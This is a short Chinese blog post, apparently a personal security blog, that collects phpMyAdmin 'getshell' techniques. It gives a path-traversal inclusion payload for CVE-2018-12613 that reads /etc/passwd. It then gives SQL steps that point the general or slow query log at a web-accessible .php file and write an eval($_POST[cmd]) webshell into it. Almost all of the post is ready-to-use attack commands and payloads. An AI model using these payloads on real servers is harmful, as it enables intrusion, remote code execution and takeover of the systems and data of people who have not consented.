phpmyadmin getshell汇总

作者: const27 分类: All,杂七杂八的安全问题 发布时间: 2020-06-03 10:24

phpmyadmin(CVE-2018-12613)漏洞利用

适用版本:phpmyadmin4.8.0——4.8.1 原因不多说了,蛮简单的,就是include($_REQUEST[‘target’])时过滤不严密导致任意文件包含.

payload:  ....index.php/?target=db_datadict.php%253f/../../../../etc/passwd

所以你可以先select “一句话木马指令”,然后包含你的操作记录文件来getshell

select into outfile 直接写shell

包含全局日志

需root权限

首先我们开启全局日志

set global general_log = on;  开启全局日志
set global general_log_file = 'G:/phpStudy/PHPTutorial/www/quan.php'; 设置全局日志的目录,我们设置在我们可通过网站访问的一个页面
select '<?php eval($_POST[cmd]);?>' 向日志写入shell,然后蚁剑连上

慢查询

与全局日志很类似

慢查询日志:用于记录执行时间超过 long_query_time 秒(默认10秒)的命令

set global slow_query_log_file = 'G:/phpStudy/PHPTutorial/www/quan.php'; 设置目录
set GLOBAL slow_query_log=on;  开启慢查询日志
select '<?php eval($_POST[cmd]);?>' and sleep(10); 写shell

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

Leave a Reply

Your email address will not be published. Required fields are marked *

标签云